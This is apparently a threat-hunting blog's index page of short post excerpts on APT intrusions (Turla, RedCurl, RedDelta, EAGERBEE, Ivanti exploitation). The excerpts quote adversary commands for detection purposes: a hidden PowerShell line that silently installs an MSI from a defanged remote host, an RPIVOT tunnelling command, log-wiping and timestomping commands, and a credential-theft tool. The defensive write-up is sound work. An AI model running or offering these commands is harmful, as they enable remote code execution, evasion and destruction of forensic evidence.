Posts

012. They Want to Know Everything About Your System!

Image
Hello everyone! Today we'll look at reconnaissance techniques leveraged by Secret Blizzard (also known as Turla) as seen in the report by Microsoft Threat Intelligence.  In this campaign Secret Blizzard used the Amadey bot to download its own backdoors to specifically selected target devices associated with the Ukrainian military. So, one of the batch scripts leveraged by adversary invoked lots of reconnaissance commands. Let's look at each of them: ver - to collect information about OS version; systeminfo - to collect compromised system information; ipconfig /all - to collect the full TCP/IP configuration for all adapters; ipconfig /displaydns - to collect the contents of the DNS client resolver cache; route print - to collect the entries in the local IP routing table; arp -a - to collect information on current arp cache tables for all interfaces; netstat -a -n - to collect information on active network connections; net share - to collect information on ...

011. Red Wolf Toolset Update

Image
Hello everyone! Adversary toolset is always evolving, and today we'll look at another example demonstrating it. Recently Huntress published a report on Red Wolf (also known as RedCurl and Earth Kapre) attacks against several organizations in Canada. The report includes information on a tool we haven't observed to be used by this activity cluster. I'm talking about RPIVOT - tool written in Python for SOCKS tunneling. To execute the tool, the adversary used the following command: pcalua.exe -a conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310 As you can see, we have lots of detection and hunting opportunities: The threat actors abused pcalua.exe using -a parameter for proxy execution. They also leveraged conhost.exe with -c and --headless parameters to hide child process window. The adversary used python.exe to execute a script from suspicious folder - a good hunting candidate. Finally, RPIVOT h...

010. Do You Detect This Example of PowerShell Abuse?

Image
Hello everyone! As you know, PowerShell can be used by the adversary to solve lots of problems, and it's almost impossible to cover all available procedures. Today we are going to look at another curious example of PowerShell abuse. Recently Recorded Future released a report on RedDelta (we track this cluster of espionage activity as Horned Werewolf), which targeted Taiwan, Mongolia, and Southeast Asia with PlugX. Just like Sticky Werewolf we discussed a few days ago, the adversary leveraged maicious MSC files. These files abused PowerShell to install an malicious MSI file from a remote resource: powershell.exe -w hidden ($ceed=new-object -comobject ‘WindowsInstaller.Installer’); ($ceed.uilevel = 2); ($ceed.installproduct(‘https[:]//versaillesinfo[.]com/brjwcabz’,’REMOVE=ALL’)); ($ceed.installproduct(‘https[:]//versaillesinfo[.]com/brjwcabz’)) Make note that malicious MSI file don't have an .msi extension. The threat actors leveraged Installer object to silently (Installer.UI...

009. Anti-Forensics and China-nexus

Image
Hello everyone! Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. The vulnerability impacts Ivanti Connect Secure VPN appliances, and successful exploitation could result in unauthenticated remote code execution. This activity was attributed to a China-nexus cluster. Despite the fact threat actors used a zero-day to gain initial access, there are lots of detection and hunting opportunities for post exploitation! Let's focus on anti-forensics techniques: The adversary leverages dmesg with -C parameter for removing entries from the debug logs:  dmesg -C Used sed with -i parameter to remove various log application event log entries:  sed -i '/segfault/d' debuglog Deleted state dumps and any core dumps using rm with -rf parameters:  rm -rf /data/var/statedumps/* As you can see, threat actors may make forensic examination a tough task. At the same time, anti-forensic methods often quite common and easy dete...

008. How Stealthy is Installation of an Advanced Backdoor?

Image
Hello everyone! Yesterday I checked a fresh report by Kaspersky on EAGERBEE backdoor , which has potrntial conections with the CoughingDown threat group. So, we already talked a bit about how noisy are APT groups in reality and how easy it is to detect malicious activity if you really want to, and this backdoor is another great example. Let's look at installation routine described in the report. First of all, to harden forensic analysis, the adversary leverages timestomping technique abusing PowerShell: powershell.exe -Command "='1/8/2019 9:57'; = 'C:\users\public\ntusers0.dat';(Get-Item ).creationtime = ;(Get-Item ).lastaccesstime = ;(Get-Item ).lastwritetime = " Remember, PowerShell can be used to solve hundreds of tasks during the attack lifecycle, so make sure you have detection analytics for timestomping. Another technique used during the installation routine - changing file attributes to hide them abusing attrib.exe: attrib.exe +s +h +a C:\users\publ...

007. A Curious Case of Microsoft Management Console Abuse

Hello everyone! As you know, phishing emails are still the most common way to deliver malware. Malicious attachments may include Microsoft Word documets, Microsoft Excel spreadsheets, executables with double extention, LNK files and many others. Some time ago we observed Sticky Werewolf to use MSC files to deliver Sliver implant to the compromised system. Windows MSC files are used in the Microsoft Management Console to manage various aspects of the operating system or create custom views of commonly accessed tools. Despite the fact it's not very common file type used by adversaries, installation routine is quite noisy and offers defenders lots of detection and hunting opportunities, for example: Execution of MSC files from suspicious locations with mmc.exe ( mmc.exe C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc ) Certutil abuse for decoding MSC files ( certutil -decode """C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc""" C:\Users\Victim\AppDat...

006. They Will Steal All Passwords from Any App with This Tool

Image
Hello everyone! As you know, almost any attack includes credential access stage. I think, many of you are well aware of tools like Mimikatz or LaZagne. But threat actors may be much more creative in their attempts to obtain credential material. For example, recently we saw threat actors, involved in ransomware attacks in CIS, actively used  XenArmor All-In-One Password Recovery Pro . It's a legitimate tool for password recovery, which allows to recover data from 270+ various applications. Not bad, right? Of course, it's used beyond CIS as well. For example, it was used by a ransomware gang behind AvosLocker . Also, it's widely used as a malware module, for example, XWorm . Currently, it's detected quite well by various antivirus software as seen on VirusTotal : Also, here are some detection and hunting tips if you don't trust your security software: Look for files with "XenArmor All-In-One Password Recovery Pro", "All-In-One Password Recovery Pro...